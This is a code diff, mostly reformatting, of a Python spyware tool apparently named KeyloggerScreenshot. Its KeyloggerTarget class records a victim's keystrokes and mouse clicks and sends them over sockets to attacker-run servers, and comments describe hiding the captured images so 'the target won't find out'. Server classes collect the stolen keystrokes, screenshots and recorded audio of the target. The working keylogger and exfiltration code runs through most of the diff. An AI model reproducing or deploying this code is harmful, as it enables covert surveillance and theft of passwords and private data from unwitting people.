@@ -14,6 +14,7 @@ import BetterPrinting as bp
 import random
 import tkinter as tk
 
+
 class KeyloggerTarget:
     def __init__(self, ip_of_server_photos, port_of_server_photos, ip_of_server_keylogger_data,
                  port_of_server_keylogger_data, ip_of_server_listener, port_of_server_listener, ip_of_timer,
@@ -122,7 +123,7 @@ class KeyloggerTarget:
             for x in range(zeit + 1):
                 if x == 20:
                     self.all_dir()
-                    #This function makes 100 files to store the image so the target won't find out
+                    # This function makes 100 files to store the image so the target won't find out
                 print(x)
                 zeit -= 1
                 time.sleep(1)
@@ -133,7 +134,7 @@ class KeyloggerTarget:
             # This is the ip and the port of the server the port shouldn't be the same the server_photos and the server_keylogger shouldn't be
             # in the same folder
             self.coordinates = list(set(self.coordinates))
-            #This checks if the coordinates occur 2 times
+            # This checks if the coordinates occur 2 times
             print(self.coordinates)
             wort = ""
             for zeichen in self.richtige_liste:
@@ -141,7 +142,7 @@ class KeyloggerTarget:
 
             # Sends the data to server_keylogger
             all_data = str(self.coordinates) + wort
-            #Coordinates and keydata are being concatenated
+            # Coordinates and keydata are being concatenated
             key_data.send(all_data.encode())
             print(wort)
             print(self.richtige_liste)
@@ -175,21 +176,22 @@ class KeyloggerTarget:
             # This removes the image
 
     def kill_switch(self):
-        #This function destroys the mouse info
+        # This function destroys the mouse info
         new_seconds = self.duration + 5
         # 20 seconds are being added because there might be a problem
         for x in range(new_seconds):
             time.sleep(1)
-        #This stopes the
+        # This stopes the
         sys.exit()
 
     def on_click(self, x, y, button, pressed):
-        #This is the click function
+        # This is the click function
         print(f"Target has pressed {x} and {y}")
-        #All the coordinates will be stored in "self.coordinates"
+        # All the coordinates will be stored in "self.coordinates"
         self.coordinates.append((x, y))
+
     def all_clicks(self):
-        #This is just a function so it can be ran with threading
+        # This is just a function so it can be ran with threading
         with Listener(on_click=self.on_click) as listening:
             self.kill_switch()
             listening.join()
@@ -197,11 +199,15 @@ class KeyloggerTarget:
     def on_press(self, key):
         try:
             try:
-                other_charecters = {"1": "!", "2": '"', "3": "§", "4": "$", "5": "%", "6": "&", "7": "/", "8": "(", "9": ")", "0": "=", "ß": "?"}
+                other_charecters = {"1": "!", "2": '"', "3": "§", "4": "$", "5": "%", "6": "&", "7": "/", "8": "(",
+                                    "9": ")", "0": "=", "ß": "?"}
                 if self.caps is True:
-                    if key.char in other_charecters: word = other_charecters[key.char]
-                    else: word = key.char.upper()
-                else: word = key.char
+                    if key.char in other_charecters:
+                        word = other_charecters[key.char]
+                    else:
+                        word = key.char.upper()
+                else:
+                    word = key.char
 
                 print(f'Alphabetische Taste wurde gedrückt: {word} ')
                 self.richtige_liste += word
@@ -221,10 +227,12 @@ class KeyloggerTarget:
                 self.caps = True
                 self.check.append(1)
             check_caps = sum(self.check) / 2
-            #If check_caps is not primary it will set self.caps to False
+            # If check_caps is not primary it will set self.caps to False
 
-            if str(check_caps)[-1] != '0': pass
-            else: self.caps = False
+            if str(check_caps)[-1] != '0':
+                pass
+            else:
+                self.caps = False
 
     def on_release(self, key):
         print(f'Key released: {key}')
@@ -239,21 +247,23 @@ class KeyloggerTarget:
             listening_thread.start()
 
             threading_mouse = threading.Thread(target=self.all_clicks)
-            #This runs the programm behind the actual programming
+            # This runs the programm behind the actual programming
             threading_mouse.start()
 
             send_timer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             send_timer.connect((self.ip_timer, self.port_timer))
 
             send_timer.send(str(self.duration).encode())
-            #This sends the seconds to the server
+            # This sends the seconds to the server
             send_timer.close()
 
             with keyboard.Listener(on_press=self.on_press, on_release=self.on_release) as listener:
-                self.countdown_send(self.duration, self.ip_photos, self.port_photos, self.ip_keylogger,self.port_keylogger)
+                self.countdown_send(self.duration, self.ip_photos, self.port_photos, self.ip_keylogger,
+                                    self.port_keylogger)
                 listener.join()
                 # This listens to the keys that where typed
 
+
 class ServerKeylogger:
     # This is the class of the Server. Both Server should not be in the same file
     def __init__(self, ip, port, simulater=False):
@@ -261,6 +271,7 @@ class ServerKeylogger:
         self.port = port
         self.simulater = simulater
         self.new_data = None
+
     def message(self, real_data):
         # To know if the server has some issues
         for zeichen in real_data:
@@ -279,7 +290,7 @@ class ServerKeylogger:
         else:
             bp.color("The Target didn't type something...", "magenta")
 
-    def check_double(self): #This function is here to check if there are more files with the same name
+    def check_double(self):  # This function is here to check if there are more files with the same name
         dir = os.listdir()
         check = [each_name for each_name in dir if "mouseInfo" in each_name]
         if len(check) == 0:
@@ -296,10 +307,12 @@ class ServerKeylogger:
         global tkWindow
         real_sec = seconds
         seconds = seconds + 4
-        #Plus four seconds because of the time the code sleeps
-        
-        if sys.platform == "linux": size = "295x367"
-        else: size = "250x415"
+        # Plus four seconds because of the time the code sleeps
+
+        if sys.platform == "linux":
+            size = "295x367"
+        else:
+            size = "250x415"
 
         tkWindow = tk.Tk()
         tkWindow.geometry(size)
@@ -309,7 +322,7 @@ class ServerKeylogger:
         this_sec = seconds - this_min
         print(f"This simulation will last for {minutes} minutes and {this_sec} seconds\n")
 
-        while seconds: #Same like Timer Class
+        while seconds:  # Same like Timer Class
             mins, secs = divmod(seconds, 60)
             timer = '{:02d}:{:02d}'.format(mins, secs)
             print(f"\rTime left: {timer}", end="")
@@ -317,9 +330,9 @@ class ServerKeylogger:
             seconds -= 1
 
         print("\nTHANK YOU FOR YOU USING KEYLOGGERSCREENSHOT")
-        #GUI BY: DYMA020
+        # GUI BY: DYMA020
         startbutton = tk.Button(tkWindow, text="Stop stimulation", command=self.changecol, height=10, width=30)
-        #Puts everything on place
+        # Puts everything on place
         startbutton.grid(row=1, column=0)
         if real_sec < 60:
             text = f"Simulation for {real_sec} seconds"
@@ -327,13 +340,13 @@ class ServerKeylogger:
             m, s = divmod(real_sec, 60)
             timer = '{:02d}:{:02d}'.format(m, s)
             text = f"Simulation for {timer} minutes"
-        #Just for decoration
+        # Just for decoration
         tk.Button(tkWindow, text=text, command=self.connection, height=10, width=30).grid(row=2, column=0)
         tkWindow.mainloop()
 
-    def changecol(self): #This function is here to if the simulation has ended
+    def changecol(self):  # This function is here to if the simulation has ended
         startbutton.configure(bg="red")
-        #This is the button
+        # This is the button
         startbutton["text"] = "Stop simulation"
         tkWindow.destroy()
 
@@ -359,28 +372,30 @@ class ServerKeylogger:
                 if len(msg) <= 0: break
                 full_msg += msg
             if ")]" in full_msg:
-                #Checks if the coordinates are there
+                # Checks if the coordinates are there
                 cord = full_msg.split(")]")
                 new_cor = cord[0] + ")]"
                 direct = os.listdir()
 
                 filename = self.check_double()
                 with open(filename, "a+") as file:
-                    #The coordinates will be stored in "mouseInfoLog.txt"
+                    # The coordinates will be stored in "mouseInfoLog.txt"
                     file.write(f"These are the coordinates of the target \n{new_cor}")
                 bp.color("The coordinates of the target have been saved to your directory", "magenta")
 
-                if cord[1] == "": bp.color("The target hasn't typed anything", "magenta")
-                else: self.message(cord[1])
+                if cord[1] == "":
+                    bp.color("The target hasn't typed anything", "magenta")
+                else:
+                    self.message(cord[1])
 
             elif "{" in full_msg and "THE CONNECTION HAS BEEN INTERRUPTED" not in full_msg:
-                #This checks if the target hasn't clicked something and if there is still some data
+                # This checks if the target hasn't clicked something and if there is still some data
                 full_msg = full_msg.replace("[]", "")
                 bp.color("The target hasn't clicked anything", "magenta")
                 self.message(full_msg)
 
             elif "[]" == full_msg and "THE CONNECTION HAS BEEN INTERRUPTED" not in full_msg:
-                #Checks if nothing has typed or clicked
+                # Checks if nothing has typed or clicked
                 bp.color("The target hasn't typed and clicked anything", "magenta")
 
             else:
@@ -404,8 +419,10 @@ class ServerKeylogger:
 
                 bp.color("\nTHE CONNECTION HAS BEEN INTERRUPTED", "magenta")
                 bp.color("THE SERVER WILL BE DESTROYED\n", "magenta")
+                os._exit(0)
                 # This shuts down the server
 
+
             if self.simulater is True:
                 print("Simulation will come in 10 seconds!!!")
                 time.sleep(10)
@@ -415,10 +432,10 @@ class ServerKeylogger:
                     sys.exit()
 
                 mouse_coordinates = [mouse for mouse in os.listdir() if "mouseInfoLog" in mouse]
-                #Looks for coordinates in mouseInfoLog
+                # Looks for coordinates in mouseInfoLog
 
                 if not mouse_coordinates:
-                    #If there isn't a file called mouseInfoLog it will destroy itself
+                    # If there isn't a file called mouseInfoLog it will destroy itself
                     print("\nThe target hasn't clicked anything")
                     print("THANK YOU FOR YOU USING KEYLOGGERSCREENSHOT")
                     sys.exit()
@@ -429,10 +446,10 @@ class ServerKeylogger:
                     for line in fhandle:
                         if "[" in line:
                             every_coordinate += ast.literal_eval(line)
-                            #This makes a list out of a string
+                            # This makes a list out of a string
 
                 img_files = [each_img for each_img in os.listdir() if "New_Image" in each_img]
-                #This checks for all Images in the directory
+                # This checks for all Images in the directory
 
                 if not img_files:
                     print('There is no "New_Image" in this directory')
@@ -455,13 +472,13 @@ class ServerKeylogger:
 
                 print(f"\nThe target has clicked {len(every_coordinate)} times on his screen")
                 threading_count = threading.Thread(target=self.countdown)
-                #The countdown will start
+                # The countdown will start
                 threading_count.start()
 
                 pg.sleep(4)
                 for image in img_files:
                     im = PIL.Image.open(image)
-                    #Opens the image
+                    # Opens the image
                     im.show()
                     time.sleep(2)
                     pg.press("f11")
@@ -480,11 +497,11 @@ class ServerPhotos:
     def __init__(self, ip, port):
         self.ip = ip
         self.port = port
-    def check_double(self): #This function is here to check if there are more files with the same name
+
+    def check_double(self):  # This function is here to check if there are more files with the same name
         dir = os.listdir()
         check = [each_name for each_name in dir if "New_Image" in each_name]
-        if len(check) == 0:
-            filename = "New_Image (1).png"
+        if len(check) == 0: filename = "New_Image (1).png"
         else:
             amount = len(check) + 1
             filename = f"New_Image ({amount}).png"
@@ -553,17 +570,18 @@ class ServerListener:
         self.ip = ip
         self.port = port
         self.filename = None
+
     def check_double(self):
-        #This function checks if The Audio file is already in the directory
+        # This function checks if The Audio file is already in the directory
         dir = os.listdir()
         check = [each_name for each_name in dir if "Audio of Target" in each_name]
         if len(check) == 0:
-            #If the directory has no file it will set the filename to default
+            # If the directory has no file it will set the filename to default
             self.filename = "Audio of Target.wav"
         else:
             amount = len(check) + 1
             self.filename = f"Audio of Target {amount}.wav"
-            #Filename will now be the amount of the audiofiles therer are directory
+            # Filename will now be the amount of the audiofiles therer are directory
 
         return self.filename
 
@@ -600,7 +618,7 @@ class ServerListener:
             # This stores everything the target was talking
 
         except OSError:
-            raise OSError("Change the port number to run without an error")
+            pass
 
 
 class Timer:
@@ -642,4 +660,4 @@ class Timer:
             full_msg += msg
 
         seconds = int(full_msg)
-        self.countdown(seconds)
\ No newline at end of file
+        self.countdown(seconds)
